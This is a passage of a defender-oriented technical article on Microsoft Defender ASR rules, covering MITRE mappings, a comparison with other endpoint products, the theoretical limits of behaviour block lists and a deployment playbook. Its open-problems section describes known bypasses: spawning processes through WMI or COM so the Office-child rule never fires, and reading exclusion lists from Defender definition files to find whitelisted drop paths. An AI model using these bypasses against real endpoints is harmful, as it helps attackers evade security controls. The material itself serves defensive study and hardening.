&lt;td&gt;&lt;code&gt;AsrAbusedSystemToolBlocked&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Also emits &lt;code&gt;AsrAbusedSystemToolWarnBypassed&lt;/code&gt; -- proof Warn is supported&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Total: &lt;strong&gt;19 rules&lt;/strong&gt;. Older blog posts that cite &quot;16 rules&quot; or &quot;17 rules&quot; reflect a 2021-2023 snapshot of the catalogue before the Safe Mode, copied-tools, USB, and Outlook variants landed.&lt;/p&gt;
&lt;h3&gt;The per-rule MITRE crosswalk&lt;/h3&gt;
&lt;p&gt;MITRE ATT&amp;amp;CK&apos;s Behavior Prevention on Endpoint mitigation (M1040) nominates ASR rules by name for several technique families. The first eight rows below are verbatim nominations from the M1040 page; the last two (T1505.003 and T1562.009) are this article&apos;s own mappings from rule semantics to the most-natural MITRE technique, because M1040 itself does not enumerate the Webshell or Safe Mode Boot techniques [@mitre-m1040]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;MITRE technique&lt;/th&gt;
&lt;th&gt;ASR rule that covers it&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;T1059.005 / T1059.007 (Command and Scripting Interpreter: Visual Basic / JavaScript)&lt;/td&gt;
&lt;td&gt;Block JavaScript or VBScript from launching downloaded executable content; Block execution of potentially obfuscated scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1543 / T1543.003 (Create or Modify System Process / Windows Service)&lt;/td&gt;
&lt;td&gt;Block abuse of exploited vulnerable signed drivers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1486 (Data Encrypted for Impact)&lt;/td&gt;
&lt;td&gt;Use advanced protection against ransomware&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1546.003 (Event Triggered Execution: WMI Event Subscription)&lt;/td&gt;
&lt;td&gt;Block persistence through WMI event subscription&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1559 / T1559.002 (Inter-Process Communication: Dynamic Data Exchange)&lt;/td&gt;
&lt;td&gt;Block all Office applications from creating child processes&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1106 (Native API)&lt;/td&gt;
&lt;td&gt;Block Win32 API calls from Office macros&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1027 / T1027.009 / T1027.010 (Obfuscated Files or Information)&lt;/td&gt;
&lt;td&gt;Block execution of potentially obfuscated scripts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1003.001 (LSASS Memory)&lt;/td&gt;
&lt;td&gt;Block credential stealing from the Windows local security authority subsystem&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1505.003 (Server Software Component: Web Shell) -- author mapping, not M1040-nominated&lt;/td&gt;
&lt;td&gt;Block Webshell creation for Servers&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;T1562.009 (Impair Defenses: Safe Mode Boot) -- author mapping, not M1040-nominated&lt;/td&gt;
&lt;td&gt;Block rebooting machine in Safe Mode&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The crosswalk gives a defender the per-technique coverage map without leaving the article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Recall from Section 1: every rule emits a rule-specific &lt;code&gt;Asr&amp;lt;RuleName&amp;gt;Audited&lt;/code&gt; and &lt;code&gt;Asr&amp;lt;RuleName&amp;gt;Blocked&lt;/code&gt; pair (the Webshell rule excepted), and the canonical universal Advanced Hunting filter is &lt;code&gt;where ActionType startswith &quot;Asr&quot;&lt;/code&gt; [@ms-learn-asr-reference].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The Webshell rule&apos;s missing &lt;code&gt;DeviceEvents&lt;/code&gt; &lt;code&gt;ActionType&lt;/code&gt; is the most visible gap in the catalogue&apos;s telemetry surface. Defenders typically use Sysmon Event ID 11 (FileCreate) in web roots and IIS access logs to corroborate blocked webshell creations on servers; the Microsoft Learn rules reference is explicit that the EDR-alerts column for this rule is &quot;N&quot; [@ms-learn-asr-reference].&lt;/p&gt;
&lt;p&gt;The universal Advanced Hunting query, demonstrated below in a runnable JavaScript shape so a reader can verify the aggregation logic without a Defender for Endpoint tenant, is the single most useful starting point for any ASR investigation.&lt;/p&gt;
&lt;p&gt;{`
// Mocked DeviceEvents rows. Replace with output of:
// DeviceEvents | where ActionType startswith &quot;Asr&quot;
// | summarize count() by ActionType, DeviceName | order by count_ desc
const deviceEvents = [
  { DeviceName: &quot;WS-FIN-042&quot;, ActionType: &quot;AsrOfficeChildProcessBlocked&quot; },
  { DeviceName: &quot;WS-FIN-042&quot;, ActionType: &quot;AsrOfficeChildProcessBlocked&quot; },
  { DeviceName: &quot;WS-FIN-118&quot;, ActionType: &quot;AsrOfficeChildProcessAudited&quot; },
  { DeviceName: &quot;WS-ENG-003&quot;, ActionType: &quot;AsrLsassCredentialTheftBlocked&quot; },
  { DeviceName: &quot;WS-FIN-042&quot;, ActionType: &quot;AsrPsexecWmiChildProcessAudited&quot; },
  { DeviceName: &quot;WS-FIN-118&quot;, ActionType: &quot;AsrVulnerableSignedDriverBlocked&quot; },
  { DeviceName: &quot;OTHER&quot;,      ActionType: &quot;DeviceLogon&quot; }, // filtered out
];&lt;/p&gt;
&lt;p&gt;const asrRows = deviceEvents.filter(r =&amp;gt; r.ActionType.startsWith(&quot;Asr&quot;));&lt;/p&gt;
&lt;p&gt;const counts = asrRows.reduce((m, r) =&amp;gt; {
  const key = r.ActionType + &quot; | &quot; + r.DeviceName;
  m[key] = (m[key] || 0) + 1;
  return m;
}, {});&lt;/p&gt;
&lt;p&gt;Object.entries(counts)
  .sort((a, b) =&amp;gt; b[1] - a[1])
  .forEach(([key, n]) =&amp;gt; console.log(n + &quot;\t&quot; + key));
`}&lt;/p&gt;
&lt;p&gt;Nineteen rules. Three categories. One catalogue that has grown by twelve rules in nine years and shows no sign of stopping. But ASR is not the only behaviour-blocking layer on the Windows endpoint. How does the catalogue compare to CrowdStrike&apos;s Indicators of Attack, SentinelOne&apos;s Storyline, App Control for Business, Sysmon, and the rest?&lt;/p&gt;
&lt;h2&gt;7. Where ASR Sits Among the Behaviour Layers&lt;/h2&gt;
&lt;p&gt;ASR is one of seven currently-deployed methods for behavioural defence on the Windows endpoint. None of them obsoletes any of the others; they layer. Counting the strengths honestly means counting the weaknesses too.&lt;/p&gt;
&lt;h3&gt;App Control for Business, AppLocker, WDAC&lt;/h3&gt;
&lt;p&gt;Identity classification. App Control for Business and its predecessor AppLocker are stricter than ASR on the identity axis (default-deny when tuned) but blind to behaviour edges among allowed binaries [@ms-learn-applocker]. The Vulnerable Driver Blocklist that ships default-on with Windows 11 22H2 is the kernel-load-time sibling to ASR&apos;s BYOVD rule and works against the same class of attack from the kernel side rather than the user side [@ms-learn-driver-block-rules]. App Control and ASR are complementary, not competing.&lt;/p&gt;
&lt;h3&gt;CrowdStrike Falcon Behavioral Indicators of Attack&lt;/h3&gt;
&lt;p&gt;Cloud-evaluated edge classifier. CrowdStrike&apos;s own one-line definition of IOAs is the cleanest a vendor has published [@crowdstrike-ioa-definition]: &quot;telltale signs or activities that signal a potential cybersecurity threat or attack is in progress. ... They aim to identify and mitigate a threat before it can fully materialize.&quot; The trade-offs cut both ways. CrowdStrike pushes new IOA rules from the cloud without an OS update -- real adaptivity. The cost: no public reference catalogue (every IOA is vendor-internal), a cloud dependency for some configurations, and a commercial licence. ASR is free; CrowdStrike is not.&lt;/p&gt;
&lt;h3&gt;SentinelOne Singularity Storyline, ActiveEDR&lt;/h3&gt;
&lt;p&gt;On-agent behavioural-AI engine with per-host storyline graph correlation and a STAR custom-rule layer. SentinelOne&apos;s product-level marketing pages return JavaScript-rendered shells or HTTP 404s to text-only fetchers, so byte-precision verification for specific features is currently unavailable. The model-level description (on-agent graph correlation that works offline) is well-attested in the secondary literature. The trade-offs mirror CrowdStrike&apos;s: vendor-internal classifier, no public catalogue, commercial licence. This article keeps the framing at the model level and avoids specific feature or performance claims.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The SentinelOne canonical product URLs are HTTP 404 or JavaScript-rendered shells with no byte-extractable text. The model-level claim (on-agent behavioural-AI graph correlation, STAR custom-rule layer, designed offline) is well-attested in the secondary literature; no specific feature claim has a single byte-verified URL behind it in this iteration.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Microsoft 365 Apps internet-macro default block&lt;/h3&gt;
&lt;p&gt;The Office-internal parallel layer that ended the macro era for unmanaged tenants [@ms-learn-internet-macros-blocked] [@ms-techcommunity-internet-macros-2022]. Office-only and macro-only; covers neither DDE, OLE, embedded executables, nor non-VBA Office attack chains. ASR remains the layer that catches the corresponding edge if the macro layer is bypassed by a managed-tenant override or by a non-macro initial-access vector.&lt;/p&gt;
&lt;h3&gt;Sysmon and custom SIEM rules&lt;/h3&gt;
&lt;p&gt;High-fidelity edge &lt;strong&gt;visibility&lt;/strong&gt;; no enforcement. Practitioners run &lt;a href=&quot;https://paragmali.com/blog/from-cmdexe-to-a-kusto-row-in-90-seconds-how-sysmon-and-defe/&quot; rel=&quot;noopener&quot;&gt;Sysmon&lt;/a&gt; alongside ASR for audit-trail coverage of edges ASR does not block and for corroborating telemetry around edges it does. Note that MITRE M1042 (&quot;Disable or Remove Feature or Program&quot;) does not mention Sysmon or ASR by name [@mitre-m1042]; the Sysmon-with-ASR pairing is practitioner consensus rather than an M1042 nomination. M1040 (Behavior Prevention on Endpoint) is the mitigation that names ASR rules verbatim [@mitre-m1040].&lt;/p&gt;
&lt;h3&gt;EDR-in-block-mode&lt;/h3&gt;
&lt;p&gt;The sibling post-event automated-response layer to ASR, not an umbrella over it. EDR-in-block-mode is &lt;strong&gt;required&lt;/strong&gt; for passive-AV configurations where Defender Antivirus is not the primary. Microsoft Learn&apos;s EDR-in-block-mode page is unambiguous about the dependency: &quot;Features like network protection and attack surface reduction (ASR) rules and indicators ... are only available when Microsoft Defender Antivirus is running in Active mode&quot; [@ms-learn-edr-in-block-mode]. EDR-in-block-mode acts strictly post-event on EDR detections; ASR acts pre-completion on the operation itself. Different points in the timeline.&lt;/p&gt;
&lt;p&gt;A common misframing places EDR-in-block-mode as the umbrella feature that &quot;covers&quot; ASR. The Microsoft Learn page contradicts that reading directly. EDR-in-block-mode is the layer that lets Defender for Endpoint block based on its EDR findings even when a third-party AV is primary; ASR is the layer that intercepts the operation at the minifilter before any other component sees it. They are siblings, not parent and child [@ms-learn-edr-in-block-mode].&lt;/p&gt;
&lt;h3&gt;The comparison matrix&lt;/h3&gt;
&lt;p&gt;The seven methods on ten axes. Read this as a trade-off space; no row dominates the others on every axis.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Method&lt;/th&gt;
&lt;th&gt;Classification axis&lt;/th&gt;
&lt;th&gt;Enforcement substrate&lt;/th&gt;
&lt;th&gt;Catalogue inspectability&lt;/th&gt;
&lt;th&gt;Cost&lt;/th&gt;
&lt;th&gt;Cloud-connectivity required&lt;/th&gt;
&lt;th&gt;OS coverage&lt;/th&gt;
&lt;th&gt;Best suited for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;ASR rules&lt;/td&gt;
&lt;td&gt;Edge&lt;/td&gt;
&lt;td&gt;Kernel-mode minifilter + user-mode service&lt;/td&gt;
&lt;td&gt;Fully public per-rule [@ms-learn-asr-reference]&lt;/td&gt;
&lt;td&gt;Free with Windows&lt;/td&gt;
&lt;td&gt;No (some rules require MAPS)&lt;/td&gt;
&lt;td&gt;Windows 10 1709+, Windows 11, Windows Server&lt;/td&gt;
&lt;td&gt;Behaviour-edge defence; macro chains; LSASS; BYOVD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;M365 Apps internet-macro block&lt;/td&gt;
&lt;td&gt;Document-trust&lt;/td&gt;
&lt;td&gt;Office process&lt;/td&gt;
&lt;td&gt;Public docs [@ms-learn-internet-macros-blocked]&lt;/td&gt;
&lt;td&gt;Free with M365&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Microsoft 365 Apps&lt;/td&gt;
&lt;td&gt;Internet-marked Office macros&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;App Control + Vulnerable Driver Blocklist&lt;/td&gt;
&lt;td&gt;Identity + driver hash&lt;/td&gt;
&lt;td&gt;Kernel&lt;/td&gt;
&lt;td&gt;Public policy XML / Block rules [@ms-learn-driver-block-rules]&lt;/td&gt;
&lt;td&gt;Free with Windows&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Windows 10+, Server&lt;/td&gt;
&lt;td&gt;Default-deny; kernel-load-time BYOVD&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;CrowdStrike Falcon IOAs&lt;/td&gt;
&lt;td&gt;Edge&lt;/td&gt;
&lt;td&gt;Agent + cloud&lt;/td&gt;
&lt;td&gt;Vendor-internal [@crowdstrike-ioa-definition]&lt;/td&gt;
&lt;td&gt;Commercial&lt;/td&gt;
&lt;td&gt;Yes (some)&lt;/td&gt;
&lt;td&gt;Cross-platform&lt;/td&gt;
&lt;td&gt;Adaptive cloud-pushed behavioural detection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SentinelOne Storyline&lt;/td&gt;
&lt;td&gt;Edge graph&lt;/td&gt;
&lt;td&gt;On-agent&lt;/td&gt;
&lt;td&gt;Vendor-internal&lt;/td&gt;
&lt;td&gt;Commercial&lt;/td&gt;
&lt;td&gt;No (designed offline)&lt;/td&gt;
&lt;td&gt;Cross-platform&lt;/td&gt;
&lt;td&gt;Per-host graph correlation&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Sysmon + SIEM&lt;/td&gt;
&lt;td&gt;Visibility only&lt;/td&gt;
&lt;td&gt;User-mode (Sysmon) + SIEM&lt;/td&gt;
&lt;td&gt;Public events; SIEM rules per-tenant&lt;/td&gt;
&lt;td&gt;Sysmon free; SIEM commercial&lt;/td&gt;
&lt;td&gt;Yes (SIEM)&lt;/td&gt;
&lt;td&gt;Windows 7+, Linux&lt;/td&gt;
&lt;td&gt;Audit trail; corroboration&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;EDR-in-block-mode&lt;/td&gt;
&lt;td&gt;Post-detection block&lt;/td&gt;
&lt;td&gt;MDE service&lt;/td&gt;
&lt;td&gt;MDE-managed&lt;/td&gt;
&lt;td&gt;Defender for Endpoint licence&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;Windows 10+, Server&lt;/td&gt;
&lt;td&gt;Passive-AV configurations&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

AV-Comparatives&apos; Endpoint Prevention and Response Test 2023 evaluated 12 EPR products against 50 multi-stage targeted-attack scenarios across three phases -- Endpoint Compromise and Foothold, Internal Propagation, Asset Breach -- over June through September 2023 [@av-comparatives-epr-2023]. Per-product scoring is paywalled and is not reproduced here; only the methodology is cited as the cross-vendor backdrop against which any &quot;ASR vs the rest&quot; empirical claim has to be measured. The article makes no specific scoring claim against AV-Comparatives data because the scoring is not publicly extractable from the free summary.
&lt;p&gt;Each row in the matrix names a different trade-off. ASR is the only row that is free, kernel-mediated, fully inspectable, and shipped with every Windows edition that includes Defender Antivirus. But the catalogue is finite. And the attacker&apos;s degrees of freedom are not. What does the theory say about the gap?&lt;/p&gt;
&lt;h2&gt;8. What No Behaviour Block List Can Do&lt;/h2&gt;
&lt;p&gt;Every defence layer has a lower bound. ASR&apos;s is &lt;strong&gt;Cohen 1984&lt;/strong&gt; -- but indirectly, through the structural floor that every edge predicate inherits.&lt;/p&gt;
&lt;p&gt;Cohen&apos;s 1984 result (introduced in Section 3 as a Definition with its diagonal-construction proof sketch and Rice-1953 corollary) proves that detection of arbitrary viral behaviour in a program reduces to the Halting Problem and is therefore undecidable in general [@cohen-1984-part1]. ASR sidesteps the result by changing the question. Not &quot;is this program malicious?&quot; -- undecidable in general -- but &quot;did this specific edge in the runtime graph just occur?&quot; -- decidable per event at the OS interception layer. The Cohen ceiling does not directly forbid edge classification; it forbids &lt;em&gt;node&lt;/em&gt; classification. Edge classification is decidable per edge.&lt;/p&gt;
&lt;p&gt;The cost is two structural floors that any behaviour-block list inherits.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The over-approximation floor.&lt;/strong&gt; Every edge predicate is itself an over-approximation of &quot;is this edge malicious.&quot; Legitimate IT-automation Word macros do legitimately spawn PowerShell. Legitimate backup software does legitimately read LSASS memory (&lt;code&gt;WerFaultSecure.exe&lt;/code&gt; appears on extracted LSASS-rule exclusion lists per Adam Svoboda&apos;s VDM-extraction technique [@adamsvoboda-asr-exclusions]). Legitimate management software does legitimately write driver files. Every ASR rule therefore has a structural false-positive floor; the per-rule exclusion list is the recovery mechanism. Exclusion lists trade safety for compatibility.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The catalogue-finiteness upper bound.&lt;/strong&gt; The space of possible attack edges is countably infinite. Any composition of &lt;code&gt;CreateProcess&lt;/code&gt;, &lt;code&gt;WriteFile&lt;/code&gt;, &lt;code&gt;RegSetValue&lt;/code&gt;, WMI subscription, scheduled task, COM &lt;code&gt;IDispatch::Invoke&lt;/code&gt;, or driver-load can be chained into a new edge sequence. The catalogue is finite -- nineteen rules in May 2026 [@ms-learn-asr-reference]. The bound is sharp: an attacker whose chain crosses any edge &lt;code&gt;e&lt;/code&gt; in the catalogue is detected at &lt;code&gt;e&lt;/code&gt;; an attacker whose chain avoids every edge in the catalogue is not.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; ASR compresses bypass cost; it does not eliminate it. The catalogue is finite. The attacker&apos;s space of edges is countably infinite. Behaviour-block lists are incomplete by construction -- and that is not a defect; it is the design philosophy. The defender&apos;s job is not to fix the incompleteness but to make every cheap attack chain expensive enough that the attacker stops using it.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The empirical evidence for the catalogue-finiteness bound is the bypass-research cluster. SANS ISC Diary 27036 (Daniel Wesemann, January 27, 2021) documents the WMI-grandparent bypass to the Office-child-process rule [@sans-isc-27036-emotet-asr]. Sevagas / Emeric Nasi&apos;s &quot;Bypass Windows Defender Attack Surface Reduction&quot; PDF (2021) documents COM-object-indirection bypasses [@sevagas-asr-bypass]. Primusinterp&apos;s &quot;Cheesing Microsoft Attack Surface Reduction rules&quot; enumerates chained-COM bypasses against the 2017-era catalogue [@primusinterp-cheesing-asr]. Adam Svoboda&apos;s VDM-extraction technique enumerates the exclusion lists themselves [@adamsvoboda-asr-exclusions]. None of these is a defect Microsoft has been slow to fix. All are structural consequences of the catalogue-finiteness bound.&lt;/p&gt;

The proof in Cohen&apos;s open-access archive reduces virus detection to the Halting Problem; the 1984 DoD/NBS conference paper is the original presentation; the 1987 *Computers and Security* reprint is the canonical citable journal form. The open-access archive at all.net is the byte-verifiable text; the verbatim sentence &quot;Protection from denial of services requires the detection of halting programs which is well known to be undecidable&quot; is on the first page of Part 1 [@cohen-1984-part1]. The line is the closest one-sentence statement of the structural ceiling that any node-classifying malware detector inherits.
&lt;p&gt;ASR&apos;s design philosophy is not to achieve the theoretical optimum of &quot;complete, sound, real-time, false-positive-free edge catalogue&quot; (unachievable for the reasons above). It is to &lt;strong&gt;compress the attacker&apos;s bypass cost&lt;/strong&gt; -- to force the attacker off the cheap, common attack chains (&lt;code&gt;WINWORD -&amp;gt; cmd -&amp;gt; PowerShell&lt;/code&gt;) onto more expensive ones (WMI grandparent, COM indirection, scheduled-task fan-out, exclusion-list enumeration, BYOVD). The Section 11 FAQ entry that picks up this thread makes it explicit.&lt;/p&gt;
&lt;p&gt;A finite catalogue, an unbounded attacker space, and a structural floor under each rule. The next section names the open problems that follow.&lt;/p&gt;
&lt;h2&gt;9. What Is Still Moving&lt;/h2&gt;
&lt;p&gt;The bypass-research corpus around ASR is not a temporary embarrassment. It is the permanent shape of every catalogue-based defence. Six open problems define the layer&apos;s research frontier as of May 2026.&lt;/p&gt;
&lt;h3&gt;Problem 1 -- The WMI and COM grandparent bypass class&lt;/h3&gt;
&lt;p&gt;The canonical bypass is documented in SANS Internet Storm Center Diary 27036, published January 27, 2021 by handler Daniel Wesemann [@sans-isc-27036-emotet-asr]. Emotet&apos;s VBA invoked &lt;code&gt;Win32_Process.Create&lt;/code&gt; via WMI, so &lt;code&gt;WmiPrvSE.exe&lt;/code&gt; became the literal parent of &lt;code&gt;cmd.exe&lt;/code&gt;; the Office-child-process rule&apos;s predicate is byte-literal (it checks the immediate parent image against the Office binary list) and therefore never fires.&lt;/p&gt;

sequenceDiagram
    participant VBA as VBA macro in WINWORD.EXE
    participant WMI as WmiPrvSE.exe (svchost host)
    participant CMD as cmd.exe
    participant WD as WdFilter.sys
    participant MP as MsMpEng.exe
    VBA-&amp;gt;&amp;gt;WMI: GetObject winmgmts, Win32_Process.Create
    WMI-&amp;gt;&amp;gt;WD: process-create notify, parent = WmiPrvSE
    WD-&amp;gt;&amp;gt;MP: edge event, parent image WmiPrvSE.exe
    MP--&amp;gt;&amp;gt;WD: rule D4F940AB predicate false, no Office parent
    WD--&amp;gt;&amp;gt;WMI: allow CreateProcess
    WMI-&amp;gt;&amp;gt;CMD: spawn cmd.exe

&apos;cmd&apos; is not a child process of Word, and the ASR block rule to prevent child processes of Word consequently doesn&apos;t trigger. -- Daniel Wesemann, SANS ISC Diary 27036, January 27, 2021 [@sans-isc-27036-emotet-asr]
&lt;p&gt;The PSExec/WMI rule (&lt;code&gt;d1e49aac-...&lt;/code&gt;) was added in Windows 10 1803 to catch the most common variant, but Microsoft Learn warns that it conflicts with Configuration Manager [@ms-learn-asr-overview]. COM-object indirection (&lt;code&gt;MMC.Application&lt;/code&gt;, &lt;code&gt;Outlook.Application&lt;/code&gt;, &lt;code&gt;ShellWindows&lt;/code&gt;) generalises the bypass beyond WMI [@sevagas-asr-bypass] [@primusinterp-cheesing-asr]. No ASR rule today covers transitive-parent classification across COM or scheduled-task fan-out without breaking Configuration Manager dependencies. The open question is whether a transitive-parent predicate can be added without breaking SCCM, and what false-positive rate that costs.&lt;/p&gt;
&lt;h3&gt;Problem 2 -- Event 5007 and exclusion-list enumeration&lt;/h3&gt;
&lt;p&gt;Adam Svoboda&apos;s technique demonstrates that ASR exclusion lists live in Defender VDM containers (&lt;code&gt;mpasbase.vdm&lt;/code&gt;, &lt;code&gt;mpasdlta.vdm&lt;/code&gt;) and are extractable with &lt;code&gt;wdextract64.exe&lt;/code&gt; [@adamsvoboda-asr-exclusions]. A low-privilege user with read access to &lt;code&gt;C:\ProgramData\Microsoft\Windows Defender\Definition Updates\&lt;/code&gt; can enumerate the whitelisted paths the LSASS rule, the BYOVD rule, and other rules carry by default. Tamper Protection prevents runtime modification of the exclusion list but does not prevent read access [@ms-learn-tamper-protection]. Once the exclusion list is enumerated, the per-rule defence becomes &quot;did the attacker drop the payload in a writable whitelisted path?&quot; -- a deployment-quality question, not a structural one. The open problem is whether the exclusion lists should be encrypted at rest with a key not derivable by an unprivileged process.&lt;/p&gt;
&lt;h3&gt;Problem 3 -- Catalogue completeness against modern initial-access vectors&lt;/h3&gt;
&lt;p&gt;Emotet&apos;s post-2022 pivot to OneNote embedded scripts, HTML smuggling, ISO and IMG containers (which strip MOTW on extraction), LNK files, and 7z archives is not covered by ASR&apos;s existing rules [@welivesecurity-emotet-pivot-2022]. SmartScreen, Network Protection, and the Microsoft 365 Apps internet-macro default block cover some of this surface, but not via ASR&apos;s edge-predicate model. The open question is whether the ASR catalogue should grow to cover OneNote-spawns-child, or whether the right answer is to rely on the parallel layers and accept that ASR&apos;s coverage of OneNote-era initial-access is partial.&lt;/p&gt;
&lt;h3&gt;Problem 4 -- The Webshell rule&apos;s missing telemetry surface&lt;/h3&gt;
&lt;p&gt;Per the Microsoft Learn rules reference, &quot;Block Webshell creation for Servers&quot; (&lt;code&gt;a8f5898e-...&lt;/code&gt;) is the only rule without a &lt;code&gt;DeviceEvents&lt;/code&gt; &lt;code&gt;ActionType&lt;/code&gt; pair [@ms-learn-asr-reference]. Defenders cannot KQL-hunt for blocked Webshell creations the way they can for every other rule; visibility lives in &lt;code&gt;MpCmdRun.log&lt;/code&gt; and IIS access logs. The open question is when Microsoft will add the missing ActionType so that the Webshell rule&apos;s audit-and-block events become uniformly queryable in Advanced Hunting.&lt;/p&gt;
&lt;h3&gt;Problem 5 -- Tamper Protection versus kernel-level attackers&lt;/h3&gt;
&lt;p&gt;ASR is enforced by &lt;code&gt;WdFilter.sys&lt;/code&gt; running at integrity level System, but a kernel-mode attacker (for example, one with a BYOVD-loaded malicious driver) is a peer. BlackByte&apos;s 2022 BYOVD campaigns demonstrated the pattern: load a vulnerable signed driver, disable Defender&apos;s notify routines, proceed [@sophos-blackbyte-returns-2022]. The ASR BYOVD rule (&lt;code&gt;56a863a9-...&lt;/code&gt;) plus the WDAC Vulnerable Driver Blocklist default-on in Windows 11 22H2 [@ms-learn-driver-block-rules] plus Hypervisor-protected Code Integrity each close a sub-class. None closes the full class, because the driver-block-list is update-cadence-bounded. The open question is whether &lt;code&gt;WdFilter.sys&lt;/code&gt; can be moved into a Virtualization-Based Security isolated enclave such that even a kernel-compromise primitive cannot tamper with ASR enforcement.&lt;/p&gt;
&lt;h3&gt;Problem 6 -- The inspectability dual&lt;/h3&gt;
&lt;p&gt;ASR&apos;s structural floor is &lt;strong&gt;catalogue finiteness&lt;/strong&gt;. The structural floor of its SOTA competitors (CrowdStrike AI-powered IOAs, SentinelOne Storyline) is &lt;strong&gt;vendor-internal inspectability&lt;/strong&gt;. When an AI-powered IOA fires, the defender has no rule GUID to look up, no published predicate to reason about, no per-edge auditability for purple-team coverage assessment. The two bounds are complementary: ASR optimises for inspectability at the cost of catalogue-growth lag; the AI-powered competitors optimise for adaptive classifier coverage at the cost of inspectability. A complete edge-classification SOTA layer would combine both. No single product currently does.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The Outflank ASR-bypass blog corpus is a well-known research-cluster member; live URLs returned HTTP 403 (Cloudflare) and Wayback Machine fallbacks were unreachable from the verification environment. Named honestly here without inventing a URL. The bypass cluster&apos;s claims are independently supported by SANS ISC [@sans-isc-27036-emotet-asr], Sevagas [@sevagas-asr-bypass], Primusinterp [@primusinterp-cheesing-asr], and Adam Svoboda [@adamsvoboda-asr-exclusions].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The catalogue is incomplete by construction. The defender&apos;s job is not to fix the incompleteness; it is to make every cheap attack chain too expensive to use. Section 10 codifies that into a Monday-morning playbook.&lt;/p&gt;
&lt;h2&gt;10. How to Actually Use This on Monday&lt;/h2&gt;
&lt;p&gt;Five steps. Source-control everything. Treat ASR not as a replacement for AppLocker, App Control for Business, or your EDR -- treat it as a kernel-mediated, free, behaviour-edge layer that costs almost nothing once tuned.&lt;/p&gt;
&lt;h3&gt;Step 1 -- Enable the three Standard protection rules in Block mode first&lt;/h3&gt;
&lt;p&gt;Microsoft itself classifies these three as low-false-positive-floor [@ms-learn-asr-overview]:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Block abuse of exploited vulnerable signed drivers (Device) -- &lt;code&gt;56a863a9-875e-4185-98a7-b882c64b5ce5&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;Block credential stealing from the Windows local security authority subsystem -- &lt;code&gt;9e6c4e1f-7d60-472f-ba1a-a39ef669e4b2&lt;/code&gt;. Note: if LSA Protection is enabled on the device (recommended together with Credential Guard), Microsoft Learn states verbatim that &quot;this rule is redundant&quot; and Defender will show the rule as &quot;not applicable&quot; [@ms-learn-asr-overview].&lt;/li&gt;
&lt;li&gt;Block persistence through WMI event subscription -- &lt;code&gt;e6db77e5-3df2-4cf1-b95a-636979351e5b&lt;/code&gt;. Even though this rule is in the Standard set, Microsoft Learn recommends extensive Audit-mode testing if Configuration Manager manages the device, &quot;because the Configuration Manager client relies heavily on WMI&quot; [@ms-learn-asr-overview].&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;Step 2 -- Move the other sixteen rules through Audit, Warn, Block&lt;/h3&gt;
&lt;p&gt;The canonical deployment ladder is enumerated in the implementation guide on Microsoft Learn: start every rule in Audit, watch &lt;code&gt;DeviceEvents&lt;/code&gt; for false positives, transition to Warn (or Block where Warn is unsupported), then transition to Block once the false-positive rate is acceptable in your first deployment ring [@ms-learn-asr-deployment-implement]. Two rules skip Warn entirely and go Audit straight to Block: Block credential stealing from LSASS and Block Office applications from injecting code into other processes [@ms-learn-asr-overview]. The other fourteen Other ASR rules support the full three-step ladder.&lt;/p&gt;
&lt;h3&gt;Step 3 -- Hunt with the universal query&lt;/h3&gt;
